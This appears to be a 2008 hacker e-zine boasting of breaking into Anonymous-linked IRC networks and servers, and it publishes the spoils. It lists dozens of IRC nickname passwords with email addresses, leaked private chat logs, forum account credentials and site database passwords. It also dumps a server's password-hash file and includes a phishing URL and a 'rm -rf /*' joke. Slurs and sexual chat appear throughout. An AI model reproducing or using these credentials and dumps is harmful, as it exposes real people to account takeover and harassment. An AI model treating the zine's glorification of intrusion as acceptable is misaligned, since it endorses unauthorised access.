_/_/_/_/_/ 444444444 ~~~~~~ _/ _/_/ _/ _/_/ _/_/ 4;;;;;;;;4 Internet Superheroes ~ _/ _/_/_/_/ _/_/ _/ _/ 4;;;;;;;;;4 _/ _/ _/ _/ _/ 4;;;;44;;;;4 With great power _/_/_/_/_/ _/_/_/ _/ _/_/ 4;;;;4 4;;;;4 comes great responsibility. 4;;;;4 4;;;;4 .` .` .`.` 4;;;;4 4;;;;4 And great babes. -+;//. `;/;/- 4;;;;444444;;;;444 -++%+. `/+/+-` 4;;;;;;;;;;;;;;;;4 -o%/o; -++/+;` 4444444444;;;;;444 ______ __ .+0%+o- `/+;/+- 4;;;;4 | |.--.--.--.-----.-----.--| | /0%-oo;`` `+o;;o/` 4;;;;4 | -- || | | | | -__| _ | `+0/.+ossoo+/.`` ` `;//+++oo-.++- 444444 |______||________|__|__|_____|_____| -0%;`-/++ooooo+o/++oossso++/`.oo; -0%oossssssssssssssssyssssso+oss/ -- Table of 0wned -- -/0o/-/syyyyyyyyyyyyyyyo;;/oso/` ``;yhyyhhhydddddyyhhyhy/` ` 1. Anonymous -ohhs//dmy/ymmmmmy;omdo+yho-` 2. g00ns -symmho;` /Nm+.sNNNNmo.;mm+``;sddo//` 3. illmob oNNdo-` +Nd; ;NNNNh; .dNo` `-odNd; 4. Safety on the Internet oMm+` oNy- `sNNmo` `hNs. /mm/` 5. Robert Lemos /Nd; +Ns. -hds. `sNs. .dm/` 6. The Fed Jingle .md; +No` ..` `sNs. `dd/ 7. Comodo `om; ;ms. `yNo` .mh- 8. CF0 .do` .dy- `hd/ ;mo` 9. Blackcode ;y- `+m; .ms. `yy; 10. Trivia Security `/+` .ho` +h/ ;y/` 11. Pwnie Awards `-. ;d; .h+` ;;` 12. The Cult of the Dead Cow ` `;/` `oo. `` 13. Pwnee Awards S y m a n t i c - T h r e a t C o n --------------------------------------------- | Level 6: # rm -rf /* | | (//////////////////////////////////////6) | ---t h i s o n e g o e s u p t o s i x---^--- At last the 2008 show! The torch-song no-one ever sings! The curfew chorus line! The comedy divine! The bulging eyes of puppets, strangled by their strings. There's thrills and chills and girls galore, there's sing-songs and surprises! There's something here for everyone, reserve your seat today! We're happy to be have you back. Do we ever have some treats! We have some sweet articles. We rm'ed g00ns, we took a successful forray into Anonymous' world, we conquered and destroyed Blackcode, and, of course, we have the Cult of the Dead Cow owned and exposed. We top those off with lots of fun little owns and articles. Kick up your feet and settle in, this is going to take all night. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Anonymous zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 /*********************************** * * We owned Anonymous. Although they sell you the idea that they cannot be owned * because they lack any structure, we owned anybody and anything involved that we * wanted to. They had a quote about being unable to kill a dragon with no head. We * just watch the dragon stumble around drunkenly and then we stab all its toes. * * We owned inky_'s main server, we owned partyvan.info, we owned a lot of people * and sites that were not worth including in this article. The anon scene is massive * and we owned whatever we wanted, and brought owns and lulz here for you. They get * a lot of press and talk a lot of shit (fucking annoying ED pages too), but all * they really are is the *chan community rebranded (currently) around the idea of * destroying the CoS. ^ban^ basically says that if you are a channer, you're anon, * and if you aren't, you aren't. * * A lot of the top guys have no respect for the morons dedicated to their cause, * and don't mind abusing or misleading them (to which they so easily follow). They * don't mind money either, as we will demonstrate. Something stinks about this, it * reminds me of *something*, if only I could remember what... * * The most talented people in Anonymous hack Scientology people. Think about that. * In the hacking world, that places them below the people who hacked * ethelsflowershop.com and above the people who DoS specialneeds.com. * * We could be dropping your names, addresses, and email addresses, but you're kids, * we do have some mercy. * * On with the show! * ***********************************/ // Hey it's that guy who tried to take over 4chan. Check out his IRC problems! Xyrix -> nickserv@anonymous.services: REGISTER 01110 x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER Xyrix A1B2C3 x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER Xyrix c0ncr3t3456 x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER Xyrix lolol x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER Xyrix maniclol x.yr.ix@hotmail.com Xyrix -> nickserv@anonymous.services: REGISTER help Speaking of which, it looks like we got a fan after rming g00ns: From: X Y To: superheroes@hushmail.com Date: Thu, 08 May 2008 19:03:20 +0100 This message is not encrypted, and is not digitally signed by . Hey, I was just wondering where you guys hung out normally. Irc or on silc? // Some select passes, starting with the [nig] bitches [nig]A_Non_E_Moose_ -> nickserv@anonymous.services: IDENTIFY qrrbrbirlbel [nig]Azure -> nickserv@anonymous.services: identify niceguyjin [nig]Azure -> nickserv@anonymous.services: identify nigguyjin [nig]Banhammer -> nickserv@anonymous.services: identify letmein [nig]CircleK -> nickserv: register bullpass1 [nig]Dart27 -> nickserv@anonymous.services: register midnight3 insurgentdart27@gmail.com [nig]Dravas -> nickserv: identify x8i9j9w [nig]Kazimir -> nickserv: identify wood.lake [nig]Moose -> nickserv@anonymous.services: identify qrrbrbirlbel [nig]Picatta -> NickServ: IDENTIFY lolcats8295 [nig]Skorski -> nickserv: identify internethate [nig]Spaise -> nickserv: identify 198956spaise [nig]Tycho -> NickServ: IDENTIFY auli711 [nig]banhammer -> nickserv@anonymous.services: identify letmein [nig]brambi -> NickServ: IDENTIFY exodus [nig]codenaur -> nickserv: REGISTER bobbin codenaur@omfgawd.org [nig]kando -> nickserv: identify qwerty [nig]kando -> nickserv: identify qwertyui [nig]msgmcmuffin -> nickserv: identify haX0rm3plz [nig]neG -> nickserv: identify fucktits [nig]shamrock -> nickserv@anonymous.services: identify jimmy123 [nig]spic -> nickserv: identify alphabette [nig]squid -> nickserv: identify w00tah // Some other passes of (mostly) relevant people in the anon scene inky_ -> nickserv: identify jblink Alyosha -> nickserv: identify CLEVERPASSWD1111 RickRollington -> nickserv: identify muddymuddykipz Rorschach -> nickserv@anonymous.services: IDENTIFY saltywalrus Tycho -> NickServ: IDENTIFY auli711 negroe -> nickserv: ghost TheShining jewslol negroe -> nickserv: identify aspadmd1 Kerx -> NickServ: identify hit13r Freeze` -> nickserv@anonymous.services: identify wtfuxsucks SpunkWang -> NickServ: IDENTIFY SpunkWang! trypta -> nickserv: identify moveon Nihilanth -> nickserv: identify bper231a Skorski -> nickserv@anonymous.services: ghost Deltantor slowpoke Muhu -> nickserv@anonymous.services: IDENTIFY niggershit7 Fail-chan -> nickserv@anonymous.services: identify cocks123 Delacroix -> nickserv: id lulzy1 f0rked -> nickserv@anonymous.services: id holyshit _meh_ -> NICKSERV: IDENTIFY iamroot innocuous -> nickserv: identify thepassword. innocuous -> nickserv: identify thenickpassword. innocuous -> nickserv: identify thenickpass. Ms_Mister -> nickserv@anonymous.services: identify farkman trapnest -> nickserv: identify aichii32 DrMengele -> NickServ: identify mofo47 bittwist -> nickserv@anonymous.services: identify sun42 Spaise -> nickserv: identify 1898956spaise nfinity0 -> NickServ: identify bluemonkey66 infinity0 -> NickServ: register Ivy saturation6666 infinity0x@gmail.com Cobrian -> Nickserv: identify Amiga32 cheezmasta_ -> nickserv@anonymous.services: IDENTIFY iamthecheese101 denvetta -> NickServ: IDENTIFY madman01 codenaur -> nickserv: IDENTIFY thaergaerg codenaur -> nickserv: identify bobbin codenaur -> nickserv: identify ilovecock // We can't make this shit up RickRollington -> chanserv: identify #insurgency h875n8w45h89 /* * * Let's start it off with #el/i/tes * */ ^ban^ -> #el/i/tes: We are True Anonymous. // And we are watching. // ^ban^ is one of the big names in anonymous.. "old anon".. check out his brilliant ideas! ^ban^ -> #el/i/tes: well, a suggestion for a board name ^ban^ -> #el/i/tes: I don't suggest we model after said board though ^ban^ -> #el/i/tes: http://4-ch.net/dqn/ ^ban^ -> #el/i/tes: The Elitist Superstructure of DQN ^ban^ -> #el/i/tes: (The Elitist Superstructure of TPN you might recognize, Nihilanth) // ^ban^ had his docs dropped already, big drama // And we finally know what old anon care about - money Kerx -> #el/i/tes: So we're not gonna sit on asses and have yet another person run our wiki and have him profit of us Kerx -> #el/i/tes: time once and for all to buy own server and do our shit on it and rent out space to make teh money Freeze` -> #el/i/tes: and how would that work Freeze` -> #el/i/tes: I'm all eyes here Kerx -> #el/i/tes: just how the guy running anonhost is doing his Kerx -> #el/i/tes: and we've got an easy way to secure money with the xenu raids Kerx -> #el/i/tes: make sure we have some true reps for the wiki go out and collect in person also on next raid // More money Kerx -> #el/i/tes: ^ban^ we already has a way to get a ton of dough // More money Picatta -> #el/i/tes: and we're putting a couple ads on it // More money Picatta -> #el/i/tes: We could do a proxy list and put ads on it // They are masters of technology and contemporary security issues TheShining -> #el/i/tes: but we can't tell anyone TheShining -> #el/i/tes: outside of this room TheShining -> #el/i/tes: i was thinking about us getting a trojan TheShining -> #el/i/tes: but modifying it TheShining -> #el/i/tes: completely TheShining -> #el/i/tes: until everything is changed to that virus scanners wont pick it up TheShining -> #el/i/tes: and distribute it to as many computers as possible TheShining -> #el/i/tes: and take as much personal information as possible TheShining -> #el/i/tes: and or hold the computers for ransom Freeze` -> #el/i/tes: hmm Freeze` -> #el/i/tes: if you could really do that Freeze` -> #el/i/tes: I'd help out TheShining -> #el/i/tes: the hardest part is to re-do the code on the trojan TheShining -> #el/i/tes: and we'd also have to keep this secret until we had at least 10,000 zombies // omg anonymous revealed 031811:fuckingfruit -> #el/i/tes: he's waiting for kakama (the leader of anonymous) to decide if to delete a wiki page or not // Kakama's site and yahoo phish page: http://login.yahoo.890m.com/yahoo.html // The illustrious ^ban^ explains that anon aren't hackers, they're channers, and if you're not a channer, you're not anon clorox -> ^ban^: you have alot of enemies...i am one of them clorox -> ^ban^: you were a faggot when we first came here to me ^ban^ -> clorox: there's a pretty simple explanation for that, you know ^ban^ -> clorox: I was here when partyvan was founded, and didn't like the idea of it abandoning the entire idea for it's founding :| ^ban^ -> clorox: The original idea was to have a network for anon, by anon, and only anon clorox -> ^ban^: what makes you anon ^ban^ -> clorox: but things didn't happen that way ^ban^ -> clorox: by anon I mean anyone from the *chan culture // IF YOU WANT TO BE ANON CLOROX YOU HAVE TO BE MORE CHAN /* * * Who wants to read the private chats of 711staff? * */ // I beg to differ jewlion -> #711staff: this is your only warning jewlion -> #711staff: what happens in here jewlion -> #711staff: stays in here // Ego lolihaetfire -> #711staff: Actually, christ, who are our other admins? inky_ -> #711staff: ^Bi am the other admin lolihaetfire -> #711staff: danke inky_ -> #711staff: why the hell does nobody acknowledge me inky_ -> #711staff: they're always like 'jewlion this' 'jewlion that' inky_ -> #711staff: if it wasn't for me this site wouldn't even exist // And rank syense -> #711staff: we sure will miss jewlion though. Kakama -> #711staff: WHAT Kakama -> #711staff: HUH? Kakama -> #711staff: JEWLION GO WHERE? syense -> #711staff: he has stepped down. syense -> #711staff: hes getting marrieda DaftWally -> #711staff: I assumed inky_ would take over syense -> #711staff: well he will [nig]Dravas -> #711staff: lol syense -> #711staff: hell be primary, with necro as second, and me as third DaftWally -> #711staff: can I be 4th? :3 [nig]Dravas -> #711staff: can i be 5th :3 syense -> #711staff: daftwally will probably be 4th // And more rank jewlion -> #711staff: if the site goes down jewlion -> #711staff: you'll have to be the one to take care of shit jewlion -> #711staff: Necrobilly and MisterCow are the only one's I'd trust with the site rite nao :| jewlion -> #711staff: but MisterCow isn't here // They're all about the money, too UnknownUser -> #711staff: I have a great idea UnknownUser -> #711staff: we could sell account levels UnknownUser -> #711staff: like say a platnum acount gets you unlimited access to all pictures [nig]ItsNotLupus -> #711staff: syense: wat UnknownUser -> #711staff: where as a normal account you can only look at 5 pics in a min // Money can buy you status jewlion -> #711staff: I gave admin to those who donated jewlion -> #711staff: and have been mods forever Dart27 -> #711staff: I was an accident. My mom said, "the ONE time me and your father had sex I got pregnant" Dart27 -> #711staff: Anyways, I've only made one thing in PHP. Dart27 -> #711staff: But it is cool. Tycho -> #711staff: why are you so hard over her anony anony -> #711staff: because i want my cock in her ass this summer Tycho -> #711staff: be sure to get vids anony -> #711staff: lewl NotDaftWally -> #711staff: yeah anony -> #711staff: i copy+pasted that to her :3 anony -> #711staff: on msn Tycho -> #711staff: i fucking hate you anony anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you (7802934048) says: anony -> #711staff: LOLOLOLOLOLOLOLOLOL anony -> #711staff: Phill says: anony -> #711staff: we're so having buttsex. anony -> #711staff: KStrebchuk. Hey Shyra: Yes there is need to miss you (7802934048) says: anony -> #711staff: No anal. Last time I tried anal I cried. lulzwhut -> #711staff: so lulzwhut -> #711staff: syense is like actually dead [nig]jewlion -> #711staff: yeah ECB -> #711staff: wut happened [nig]jewlion -> #711staff: fluid leak [nig]jewlion -> #711staff: in his car [nig]jewlion -> #711staff: dunno wat ECB -> #711staff: so i get his o:line?!?! [nig]jewlion -> #711staff: but it caused him to hit a semi Tycho -> #711staff: I shoulda backed everything up Tycho -> #711staff: WHEN YOURE POUNDING A GIRL FROM BEHIND Tycho -> #711staff: AND HER BACK ARCHES Tycho -> #711staff: THAT IS FUCKING HOT Howler -> #711staff: guys can do that too // 711staff paypal. Word to the wise: disable it Dravas -> #711staff: dravas@loliheaven.net inky_ -> #711staff: apu and aero are what host 711 anony -> #711staff: it felt like i stole keri from you anony -> #711staff: so I stopped talking to her andy -> #711staff: uh andy -> #711staff: lost stole her andy -> #711staff: from all of you /* * * There's this "blackops" group that tried to be something, but they just generate humour * */ MDK -> #blackops: yeh we need a pw thats easy to remember Spaise -> #blackops: umm what about Spaise -> #blackops: opsareblack Spaise -> #blackops: anything else we neeD? Spaise -> #blackops: ummm Spaise -> #blackops: flood protection MDK -> #blackops: how do you change the topic with this script? carbonlesz -> #blackops: ... Damnit, MDK. Stop capitalizing random letters of words in passwords. // He means the IRC channel mode Spaise -> #blackops: hmm cant have private set if its secret Spaise -> #blackops: grr carbonlesz -> #blackops: I should probably use a proxy. /* * * The guys running the wiki are incompetent * */ f0rked -> #wiki: oh, I thought it was ddosed or something denvetta -> #wiki: picatta's away somewhere denvetta -> #wiki: Well.. that's possible... but picatta assures me that the server is ddos proof infinity0 -> #wiki: WedTM: NO. nothing was hacked infinity0 -> #wiki: it was just an exploit in the mediawiki software Picatta -> #wiki: OH ASHI- Picatta -> #wiki: DHIT Picatta -> #wiki: /var is full Apon71 -> #wiki: Big problems with nameserver? Picatta -> #wiki: yes Apon71 -> #wiki: Ok, I trust you guys will fix it as always Apon71 -> #wiki: I've been away for a week, and am trying to catch up on what's happening Picatta -> #wiki: I can't really do shit until wedtm gets back Apon71 -> #wiki: Either the wiki got hacked Apon71 -> #wiki: Or one of you is trying to scare away newfags Ivy -> #wiki: Apon71: yeah it's someone trying to scare away newfags, i'm guessing Kakama, sigh januszeal -> #wiki: why is the wiki down januszeal -> #wiki: in before, after, and during slowpoke Picatta -> #wiki: well a-n-o-n -> #wiki: wtf... a-n-o-n -> #wiki: wiki down? Kakama -> #wiki: ATTENTION SHOPPERS infinity0 -> #wiki: Picatta: wiki down again... we should split up the SQL server vs. the webserver again denvetta -> #wiki: wiki down denvetta -> #wiki: can someone add it to /topi? // They actually had the most successful individual security strategy we came // across - the wiki was down for the majority of the time we had it owned. // Made it a big pain in the ass and mostly we didn't bother. /* * * #anti includes people behind ED. We were hoping oclet would be passing 0day * around, but the only thing he has or passes is drugs. He's mostly a failure * at this hacker thing but wins at lulz. * */ Talldog -> #anti: Having seen a woman be fucked by a horse, my pants feel strangely empty hep -> #anti: i saw women getting fucked by horses when i was still bbsing oclet -> #anti: ive seen .millions of girls getting fucked by horses just on accident sabotage -> #anti: i miss tacos sabotage -> #anti: i banged tacos like 10 times too Shortcat -> #anti: what happen oclet -> #anti: me2 sabotage -> #anti: i think she was on top and i started to cum oclet -> #anti: lets gang bang her sabotage -> #anti: and i threw her off oclet -> #anti: i searched facebook with my last name oclet -> #anti: theres a lotof bitches i might be related to who are bangin hep -> #anti: i am a one dick kind of girl hep -> #anti: having a vagina does not entitle you to autorespect // Just imagine more of the above, that's 100% of their conversations /* * * And basically everyone else in the community is a joker. Here are some random * quotes * */ paraphren -> _Shinigami_: Think she's hot? http://photos-c.ak.facebook.com/photos-ak-sf2p/v195/7/84/788288923/n788288923_3 51134_2156.jpg _Shinigami_ -> paraphren: fuck yes paraphren -> _Shinigami_: She's 18. Want a chance to fuck her? _Shinigami_ -> paraphren: yes pls paraphren -> _Shinigami_: heh _Shinigami_ -> paraphren: lol paraphren -> _Shinigami_: Well, first thing... don't mention any of this to ANYBODY. _Shinigami_ -> paraphren: k paraphren -> _Shinigami_: I will quite literally have to kill you. heh _Shinigami_ -> paraphren: lol k paraphren -> _Shinigami_: Secondly... I have to talk her into it. She's coming to Toronto to fuck me and wants to film it and shit, but I can let you have a go at her if you want. heh paraphren -> _Shinigami_: Anyway, she's a dirty girl and I'll probably be in the room too. So hope you're up for it. :p _Shinigami_ -> paraphren: lol, sounds fine to me _Shinigami_ -> paraphren: i can be the videographer if you want paraphren -> _Shinigami_: Seriously though... very important you tell NOBODY. haha CuNt -> Eric: w/e dude i do have a life other than computers CuNt -> Eric: and i guarentee its a shit load better than yours Eric -> CuNt: *rollseyes* Eric -> CuNt: sureeeee buddy CuNt -> Eric: sureeee buddy Eric -> CuNt: I make more in a week then u do in a year CuNt -> Eric: what do u make then dude Eric -> CuNt: I bang more chicks in a month that u ever will d0ct0r -> Eric: how did you join a haxs' group. Eric -> d0ct0r: obviously I knew me shit Eric -> d0ct0r: perl, vb, c, the basics Agent_Riding -> #Philadelphia: so gnome is like the explorer.exe of ubuntu TurbUlated -> anon080: <- sortofwant anon080 -> TurbUlated: oh. anon080 -> TurbUlated: your secret is safe mattheas -> #fallout: How do I add people mattheas -> #fallout: what's the command anon64 -> #fallout: /invite srgrnr -> #fallout: i want to go back to high school srgrnr -> #fallout: where i had friends. anon64 -> #fallout: high school was gay srgrnr -> #fallout: i had friends, dude. srgrnr -> #fallout: HOW THE FUCK srgrnr -> #fallout: DO I UNIGNORE SOMEONE srgrnr -> #fallout: ON IRC Phist -> #illmob: Spyd3r: jewlion is one of the top submitters on darknet Phist -> #illmob: 16 year old anon- turned compsec ethic expert Eugene -> HetGezicht: I don't have skills for ddos skinless -> Consumerwhore: feel like giving me a short explanation of how to get into a site? skinless -> Consumerwhore: i have php python and perl kayla -> codenaur: http://www.google.co.uk/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla %3Aen-GB%3Aofficial&hs=BBT&q=warning%3A+incompatible+implicit+declaration+of+bu ilt-in+function+memcpy&btnG=Search&meta= kayla -> codenaur: memcpy is a function codenaur -> kayla: ah codenaur -> kayla: :D codenaur -> kayla: Thanks <3 // Shit this isn't very anonymous barbanon -> #socal: Gregg Hagglund up in Canada has been tagged as the leader there QED|Pi -> Machine-Gunner: I'll just say they're for Stephen.A Machine-Gunner -> QED|Pi: oh fuck Machine-Gunner -> QED|Pi: :P QED|Pi -> Machine-Gunner: Nice.. Machine-Gunner -> QED|Pi: Fuuuuuck Machine-Gunner -> QED|Pi: How did you know QED|Pi -> Machine-Gunner: it's your ident QED|Pi -> Machine-Gunner: Stephen.A.@desu-C67BC7B.carleton.ca // We owned this. It's between "Not worth mentioning" and "Not worth its own // section", so we drop it here define(SQLHOST, 'lulzhost.net'); //MySQL server address, usually localhost define(SQLUSER, 'img'); //MySQL user (must be changed) define(SQLPASS, '3ecaa923-4c0e-4526-9f44-c8a437d88bb5'); //MySQL user's password (must be changed) define(SQLDB, 'img'); //Database used by image board define(ADMIN_PASS, 'fgt'); //Janitor password (CHANGE THIS YO) // BANG ON - Give this guy a medal and put him in charge (except he's not dumb // enough to accept responsibility for this crap shoot) Orakio -> #programming: Anonymous = mostly idiots. Orakio -> #programming: Don't work directly with them. Orakio -> #programming: It's better to linger on the edges, find a good subgroup. Orakio -> #programming: I mean I hate scientology and I don't need to be in some group called anonymous to express that hate. Orakio -> #programming: Especially when they can't even renew their domain names. Orakio -> #programming: It's a liability to be too closely intergrated. // He has a 30-character nickserv password. No joke. GaiaKB -> #privateprivategaia: ServicesUp|Sun Mar 30 04:05:51 EDT 2008|~! Do NOT talk about #privateprivategaia GaiaKB -> #privateprivategaia: Something|Sun Mar 30 04:09:59 EDT 2008|~! Everything discussed here, stays here // ZF0 has magic powers that can read your conversations even (yes, even!!) if // you're using SSL! ian -> #spk: i pasted that in spk ian -> #spk: he cant know that ian -> #spk: i use ssl /* * * Picatta's spools took up a lot of space, so here's just some mails clean and * clear * */ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Dear Hitlerlol, Thank you for registering at the Megadeth Forums. Before we can activate your account one last step must be taken to complete your registration. Please note - you must complete this last step to become a registered member. You will only need to visit this url once to activate your account. To complete your registration, please visit this url: http://forums.megadeth.com/register.php?a=act&u=69022&i=27200622 America Online Users Please Visit Here to be Activated **** Does The Above URL Not Work? **** If the above url does not work, please use your Web browser to go to: http://forums.megadeth.com/register.php?a=ver Please be sure not to add extra spaces. You will need to type in your username and activation number on the page that appears when you visit the url. Your Username is: Hitlerlol Your Activation ID is: 27200622 If you are still having problems signing up please contact a member of our support staff at webmaster@megadeth.com All the best, Megadeth Forums /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Hi, You have requested to register the following nickname Picatta. Please type " /msg NickServ confirm u95oIIpO3 " to complete registration. If you don't know why this mail was sent to you, please ignore it silently. PLEASE DON'T ANSWER TO THIS MAIL! Rizon administrators. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Dear Picatta, Thank you for registering at Bodybuilding.com. Before we can activate your account one last step must be taken to complete your registration. Please note - you must complete this last step to become a registered member. You will only need to visit this url once to activate your account. To complete your registration, please visit this url: http://my.bodybuilding.com/register.php?a=3Dact&u=3D13453212&i=3D725985 83 America Online Users Please Visit Here to be Activated **** Does The Above URL Not Work? **** If the above url does not work, please use your Web browser to go to: http://my.bodybuilding.com/register.php?a=3Dver Please be sure to type it exactly as it appears. You will need to type in your Username and Activation ID on the page that appears when you visit the url. Your Username is: Picatta Your Activation ID is: 72598583 If you are still having problems signing up please contact a member of our support staff at support@bodybuilding.com. All the best, Bodybuilding.com /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Welcome to forum.i2p Forums Please keep this email for your records. Your account information is as follows: ---------------------------- Username: Picatta Password: lolcats8295 ---------------------------- Please do not forget your password as it has been encrypted in our database and we cannot retrieve it for you. However, should you forget your password you can request a new one which will be activated in the same way as this account. Thank you for registering. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Welcome to Operation Clambake Message Board Forums Please keep this email for your records. Your account information is as follows: ---------------------------- Username: Picatta Password: loldongs ---------------------------- Your account is currently inactive, the administrator of the board will need to activate it before you can log in. You will receive another email when this has occured. Please do not forget your password as it has been encrypted in our database and we cannot retrieve it for you. However, should you forget your password you can request a new one which will be activated in the same way as this account. Thank you for registering. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ Welcome to Enturbulation.org Forums Please keep this email for your records. Your account information is as f= ollows: ---------------------------- Username: Picatta Password: 86500144 ---------------------------- Your account is currently inactive. You cannot use it until you visit the= following link: /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/ /* * * Now let's get to the box pwning. This is inky's server that hosts a handful of their shitty sites * */ drwxr-xr-x 4 root wheel 512 Feb 14 03:05 bbs.711chan.org drwxr-xr-x 4 root wheel 512 Feb 6 07:03 invalid.site drwxr-xr-x 4 httpd httpd 512 Jan 26 09:24 lt3c.info drwxr-xr-x 4 root wheel 512 Feb 1 15:41 maps.lt3c.info drwxr-xr-x 4 root wheel 512 Feb 19 01:42 no-tolerance.info drwxr-xr-x 4 root wheel 512 Feb 7 06:53 partyvanradio.org drwxr-xr-x 4 root wheel 512 Mar 7 15:13 untitledhosting.org drwxr-xr-x 4 root wheel 512 Feb 19 19:15 virtual.psychomatic.us drwxr-xr-x 4 root wheel 512 Mar 11 04:13 vzpp.untitledhosting.org lrwxr-xr-x 1 root wheel 10 Jan 26 09:24 www.lt3c.info -> lt3c.info/ lrwxr-xr-x 1 root wheel 18 Feb 19 01:43 www.no-tolerance.info -> no-tolerance.info/ lrwxr-xr-x 1 root wheel 18 Feb 7 06:53 www.partyvanradio.org -> partyvanradio.org/ lrwxr-xr-x 1 root wheel 20 Mar 7 15:13 www.untitledhosting.org -> untitledhosting.org/ $config['db_username'] = 'untitledhosting'; $config['db_password'] = '0DTtITKJ.yBD'; $dbhost = 'localhost'; $dbport = '3306'; $dbname = 'lt3c_phpbb'; $dbuser = 'root'; $dbpasswd = 'jblink'; // ^ that's the root pw too! And his nickserv pass! We rooted the box too fast // to even have to look up his nickserv pass $db_server = 'localhost'; $db_name = 'nt-server'; $db_user = 'nt-server'; $db_passwd = 'nm2KHZaWzwZbWrxT'; $db_prefix = 'smf_'; $config['dbms'] = 'mysql'; $config['db_hostname'] = 'localhost'; $config['db_username'] = 'untitledhosting'; $config['db_password'] = '0DTtITKJ.yBD'; $config['db_name'] = 'untitledhosting'; d>hacked by [seven11]

Hacked by [seven11]inky, [PURGE] are a load of faggots

// ^ haha # shoutcast Password=imadj AdminPassword=partyvanorg # $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:$1$40oTVDjS$IXT5EmlwEhu84acMjAZ/J/:0:0::0:0:Root User:/root:/usr/bin/bash toor:*:0:0::0:0:Bourne-again Superuser:/root: daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin operator:*:2:5::0:0:System &:/:/usr/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin ltsvadmin:$1$2fVGuwaC$7B57fBkwiTg9W1S5VKD5u1:1001:1001::0:0:User &:/home/ltsvadmin:/bin/sh zipservers:$1$A.lwsVBx$CmzJM6Wt3RX6jOvByFKSv0:1002:0::0:0:User &:/home/zipservers:/bin/sh inaki:*:1003:1003::0:0:Inaki:/home/inaki:/usr/local/bin/bash tremulous:*:1006:1006::0:0:User &:/home/tremulous:/usr/local/bin/bash trem-maps:*:1008:1008::0:0:User &:/home/trem-maps:/bin/sh ms-clanserver:$1$KkKxsoei$936d9IWKWrptqxTRqCcKw.:1009:1009::0:0:User &:/home/ms-clanserver:/usr/local/bin/bash mysql::88:88::0:0:MySQL Daemon:/nonexistent:/usr/local/bin/bash httpd::1015:1015::0:0:User &:/home/httpd:/usr/local/bin/bash mjestic::1017:1017::0:0:User &:/home/mjestic:/bin/sh alma-server::1018:1018::0:0:alma-server:/home/alma-server:/usr/local/bin/bash test-serv::1019:1019::0:0:test-serv:/home/test-serv:/usr/local/bin/bash negroe:$1$GJKcFbkI$eMgx8tGbbuAsIY7z4jrqT/:1020:1020::0:0:User &:/home/negroe:/usr/local/bin/bash helldive::1021:1021::0:0:helldive:/home/helldive:/usr/local/bin/bash relentless:$1$hzrBuTFU$LxjyfrPLRNO5orBe/pw8V.:1022:1022::0:0:User &:/home/relentless:/usr/local/bin/bash nt-server:$1$bAEJNi4W$JCRyivGro8EsX/yMCouDS/:1023:1023::0:0:User &:/home/nt-server:/usr/local/bin/bash syense:$1$tHx1g5xm$HDClXkM2jE1bosbJDjG.V/:1024:1024::0:0:User &:/home/syense:/usr/local/bin/bash trem12:$1$x1CIdzvF$LSaYQRI5aZU0gPSTfOggw0:1025:1025::0:0:User &:/home/trem12:/usr/local/bin/bash 